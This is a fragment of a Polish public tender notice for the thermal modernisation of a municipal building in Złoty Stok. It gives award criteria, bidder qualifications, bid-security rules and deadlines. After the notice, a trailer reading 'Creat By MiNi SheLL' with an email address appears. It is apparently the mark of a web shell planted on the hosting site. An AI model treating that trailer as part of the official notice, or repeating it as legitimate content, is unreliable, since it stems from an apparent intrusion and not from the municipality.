class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III: Termomodernizacja budynku użyteczności publicznej przy ul. Wiejskiej 2 w Złotym Stoku w formule wybuduj<br/>Zamawiający informuję, że wszystkie prace będą prowadzone na terenie czynnych obiektów i w związku z powyższym Wykonawca zobowiązany jest uzyskać wszelkie konieczne zgody i zezwolenia Zamawiającego i prezesa PP-U „KOMA” Sp. z o.o. do wyłączeń instalacji, niezbędnego zdemontowania istniejących instalacji, zamontowania instalacji i urządzeń tymczasowych, usunięcia instalacji i urządzeń tymczasowych i ponownego zamontowania istniejących instalacji i każdorazowo na podstawie uzgodnień poczynionych z Zamawiającym i prezesem PP-U „KOMA” Sp. z o.o.. <br/>Teren przewidziany pod przedmiotowe zamierzenie inwestycyjne znajduje się w Złotym Stoku przy ul. Wiejskiej 2 na cz. dz. oznaczonych nr 458, 459, obręb Złoty Stok.<br/>Budynek znajduje się w centrum miasta przy skrzyżowaniu z drogą krajową (ul. Kłodzką).<br/>Obszar objęty inwestycją jest lekko pochyły, o poziomie terenu wahającym się pomiędzy 351,7 i 353mnpm, z niewielkim spadkiem w kierunku ul. Kłodzkiej.<br/>Budynek użytkowany administracyjno-socjalnie, we wschodniej części znajduje się jednostka ochotniczej straży pożarnej. Poddasze w części nieużytkowe. Obiekt częściowo podpiwniczony z osobnym wejściem od zewnątrz.<br/>Nie występują pomieszczenia przeznaczone dla jednoczesnego pobytu więcej niż 50 osób.<br/>Dotychczasowy sposób użytkowania budynku nie ulegnie zmianie.<br/><br/><br/><br/><br/>Termomodernizacja obejmuje:<br/>A. wykonanie robót budowlanych nie wymagających pozwolenia na budowę, natomiast wymagających zgłoszenia<br/>polegających na:<br/>1. przebudowie polegającej na dociepleniu budynku o wysokości powyżej 12m i nie wyższym niż 25m tj.:<br/>- docieplenie ścian zewnętrznych,<br/>- docieplenie ścian fundamentowych wraz z ich osuszeniem i wykonaniem izolacji przeciwwodnych /<br/>przeciwwilgociowych, oraz żwirowej opaski ochronnej wokół budynku,<br/>- docieplenie posadzek na gruncie,<br/>- docieplenie stropów pomiędzy częścią ogrzewaną i nieogrzewaną,<br/>- docieplenie dachu wraz z demontażem obecnych przegród oddzielających od palnej konstrukcji dachu i palnego przekrycia dachu z montażem w ich miejsce nowych przegród o klasie odporności ogniowej<br/>EI60,<br/>2.remoncie obejmującym.:<br/>- demontaż zamontowanych w latach 80tych XXw. płyt włóknisto-cementowych stanowiących obecne pokrycie dachowe, wymiana na pierwotne pokrycie dachówką, bądź na blachodachówkę<br/>- wymiana rynien wraz z rurami spustowymi, pasami podrynnowymi i nadrynnowymi<br/>- wymiana obróbek blacharskich<br/>- wymiana instalacji odgromowej<br/>B. wykonanie robót budowlanych nie wymagających pozwolenia na budowę ani zgłoszenia,<br/>polegających na:<br/>1. instalowaniu pomp ciepła (nowe źródło ciepła dla instalacji c.o. i c.w.u),<br/>2. instalowanie urządzeń fotowoltaicznych o mocy nie większej niż 25kW (na dachu obiektu)<br/>3. montażu wewnątrz użytkowanego budynku nowych instalacji c.o. wraz z demontażem istniejącej<br/>4. wprowadzenie niezbędnych zmian w instalacji c.w.u. (połączenie z nowym źródłem ciepła)<br/>5. remont przewodów wentylacyjnych<br/>6. wymiana opraw oświetleniowych w budynku na energooszczędne<br/><br/>Obiekt nie jest wpisany do rejestru zabytków, ani nie znajduje się na obszarze wpisanym do rejestru zabytków.<br/><br/>Gmina Złoty Stok posiada zaświadczenie Starostwa Powiatowego w Ząbkowicach Śląskich znak WB.6743.514.2024.ES z dnia 23.09.2024r. o braku sprzeciwu wobec zamiaru wykonania w/w robót budowlanych.<br/><br/>1)	Szczegółowy zakres robót określa projekt zagospodarowania terenu, projekt techniczny, projekt wykonawczy „ Termomodernizacja budynku użyteczności publicznej przy ul. Wiejskiej w Złotym Stoku” autorstwa Architektoniczna Pracownia Projektowa Wojciech Marciniak, specyfikacje techniczne wykonania i odbioru robót budowlanych w branży sanitarnej, elektrycznej oraz przedmiary branżowe robót stanowiący materiał pomocniczy do oszacowania ceny ofertowej Wykonawcy stanowiące załączniki do SWZ.<br/>2)	Wykonawca zobowiązuje się do wykonania wszystkich robót niezbędnych w celu wykonania przedmiotu zamówienia zgodnie z dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót budowlanych, z zasadami wiedzy technicznej i sztuki budowlanej, obowiązującymi przepisami, normami, uzgodnieniami, z zaleceniami inwestora oraz do oddania przedmiotu zamówienia Zamawiającemu, w określonym terminie. <br/>3)	Przedmiot zamówienia musi być wykonany zgodnie z obowiązującymi na dzień odbioru końcowego przepisami i normami, a w szczególności z przepisami Prawa budowlanego oraz na ustalonych w projekcie umowy warunkach. <br/>4)	Wykonawca, oprócz ww. obowiązków zobowiązuje się do: <br/>a)	protokolarnego przejęcia terenu budowy w terminie 3 dni roboczych od dnia podpisania umowy, jego zabezpieczenia i należytego utrzymania, <br/>b)	organizacji zaplecza budowy oraz pomieszczeń socjalno-sanitarnych dla pracowników i miejsca składowania materiałów, <br/>c)	zapewnienia dostawy niezbędnych mediów do realizacji robót i opłaty za ich dostawę; wykonawca we własnym zakresie zapewnia niezbędne media warunkujące prawidłowe wykonawstwo robót,<br/>d) poniesienia wszelkich kosztów związanych z realizacją i bieżącym nadzorem kierownika budowy nad robotami oraz wypełnieniem wszystkich zobowiązań wynikających z decyzji, uzgodnień i opinii, <br/>e)	przekazania Zamawiającemu oświadczenia o podjęciu obowiązków przez kierownika budowy, w dniu podpisania umowy, <br/>f)	uporządkowania terenu budowy i terenu przyległego po zakończeniu robót, <br/>g)	wywozu materiału i gruzu z rozbiórki na składowisko odpadów i poniesienia kosztów ich składowania <br/>h)	obsługi geodezyjnej w trakcie realizacji robót budowlanych, <br/>i)	ochrony punktów osnowy geodezyjnej, a w przypadku ich zniszczenia lub konieczności ich przeniesienia - zlecenia uprawnionej jednostce wykonawstwa geodezyjnego ich odtworzenia lub założenia nowych, <br/>j)	przedłożenia Zamawiającemu przed podpisaniem umowy dokumentów wynikających ze specyfikacji warunków zamówienia,<br/>k)	wykonania badań i pomiarów w czasie wykonywania robót budowlanych oraz badań odbiorowych zgodnie ze specyfikacją techniczną wykonania i odbioru robót budowlanych, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona w oparciu o przedstawione w SWZ kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>1)	nie podlegają wykluczeniu na zasadach określonych w Rozdziale XV SWZ,<br/>2)	spełniają warunki udziału w postępowaniu dotyczące: <br/>a)	zdolności do występowania w obrocie gospodarczym - Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia.<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia.<br/>c)	sytuacji ekonomicznej lub finansowej - Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia, na sumę gwarancyjną co najmniej 800.000,00 zł (słownie: osiemset tysięcy złotych 00/100);<br/>d)	zdolności technicznej lub zawodowej. <br/>−	Wykonawca w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej 1 zadanie polegające na realizacji robót budowlanych - obejmujących budowę (w rozumieniu art. 3 pkt. 6 ustawy z dnia 7 lipca 1994 r. Prawo budowlane) lub przebudowę (w rozumieniu art. 3 pkt. 7a ustawy Prawo budowlane) budynku,<br/><br/>−	Wykonawca dysponuje lub będzie dysponować osobami, które skieruje do realizacji zamówienia publicznego: minimum 1 osobę – Kierownika budowy – posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">b)	W celu potwierdzenia spełniania warunków udziału w postępowaniu: <br/>−	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z po-daniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o któ-rych mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpo-wiednie dokumenty (wzór wykazu stanowi załącznik nr 6 do niniejszej SWZ), <br/>−	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publiczne-go, w szczególności odpowiedzialnych za kierowanie i nadzorowanie robotami, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, i wy-kształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu stanowi załącznik nr 7 do niniejszej SWZ), <br/>−	dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1.	Aktualne na dzień składania ofert oświadczenie o spełnieniu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania – załącznik nr 3 do SWZ. Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu (art. 125 ust 1 ustawy pzp). Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym.<br/>Oświadczenie składają odrębnie wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>2. w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby (wzór oświadczenia stanowi załącznik nr 9 do SWZ)<br/>3. zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (wzór oświadczenia stanowi załącznik nr 10 do SWZ).<br/>4. w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia -oświadczenie, z którego będzie wynikać, które roboty budowlane wykonają poszczególni wykonawcy (wzór oświadczenia stanowi załącznik nr 8 do SWZ) <br/>5.	Pełnomocnictwo - gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, z którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia; powinno zawierać: nazwę postępowania o zamówienie publiczne, którego dotyczy, wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, ustanowionego pełnomocnika oraz zakres jego umocowania. Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza. <br/>6.	Zastrzeżenie tajemnicy przedsiębiorstwa, (jeżeli dotyczy) – w sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca, wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. Dokument musi być złożony w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie (wzór – załącznik nr 11).<br/>7. Dokument potwierdzający wniesienie wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta musi być zabezpieczona wadium w wysokości: <br/>Część I: 10 000 zł (słownie: dziesięć tysięcy złotych 00/100) <br/>Część II: 12 000 zł (słownie: dwanaście tysięcy złotych 00/100)<br/>Część III: 15 000 zł (słownie: piętnaście tysięcy złotych 00/100)<br/>2.	Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w niniejszym rozdziale SWZ.<br/>3.	Formy wnoszenia wadium: wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2020r. poz. 299).<br/>4.	Termin wnoszenia wadium upływa w dniu w którym upływa termin składania ofert.<br/>5.	Wadium wnoszone w pieniądzu należy wpłacać przelewem na następujący rachunek bankowy: Bank Spółdzielczy w Ząbkowicach Śl., oddział Złoty Stok, nr rachunku 79 9533 1069 2008 0006 8303 0004 z adnotacją „Wadium w postępowaniu nr RL.271.3.2025 – część …”<br/>Uwaga : Wadium w tej formie uważa się za wniesione w sposób prawidło-wy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składnia ofert.<br/>6.	W przypadku wyboru formy niepieniężnej wadium Wykonawca zobowiązany jest wnieść je przy użyciu środków komunikacji elektronicznej w formie oryginalnego elektronicznego dokumentu wadialnego (np. e-gwarancji bankowej lub ubezpieczeniowej) opatrzonego kwalifikowanym podpisem elektronicznym osoby upoważnionej do wystawienia dokumentu wadialnego (np. e-gwarancji bankowej lub ubezpieczeniowej). <br/>Niedopuszczalne jest złożenie skanu dokumentu wadialnego (np. e-gwarancji bankowej lub ubezpieczeniowej) opatrzonego kwalifikowanym podpisem elektronicznym. <br/>7.	W przypadku wyboru formy niepieniężnej wadium Wykonawca zobowią-zany jest złożyć dokument wadialny (np. e-gwarancję bankową lub ubez-pieczeniową) wraz z ofertą w ten sam sposób co ofertę przy użyciu środ-ków komunikacji elektronicznej, jednakże w wydzielonym odrębnym pliku (np: .pdf), <br/>8.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, treść dokumentu wadialnego musi zapewniać możliwość zaspokojenia interesów Zamawiającego co oznacza, że uzyskanie zagwarantowanej zapłaty wadium musi obejmować wszystkie wskazane w ustawie przesłanki zatrzymania wadium, o których mowa w art. 98 ust. 6 ustawy, tj. działania lub zaniechania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:<br/> a) w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia, z postępowania na podstawie art. 108 ust. 1 ustawy Pzp,<br/>b)ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania, <br/>c)muszą ustanowić pełnomocnika wykonawców występujących wspólnie do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzoną przez notariusza. Powinno zawierać: nazwę postępowania o zamówienie publiczne,którego dotyczy, wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, ustanowionego pełnomocnika oraz zakres jego umocowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Warunki zmian postanowień umowy.Zmiany treści niniejszej umowy wymagają po rygorem nieważności zgody obu stron, z zachowaniem formy pisemnej i są dopuszczalne wyłącznie w trybie art. 455 – ustawy z 11 września 2019 r. – Prawo zamówień publicznych (Dz.U.2023.1605 z późn. zm.) Pozostały rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały zawarte we wzorze umowy, stanowiącym załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy dostępnej pod adresem: https://zlotystok.ezamawiajacy.pl w zakładce „OFERTY”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-07 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com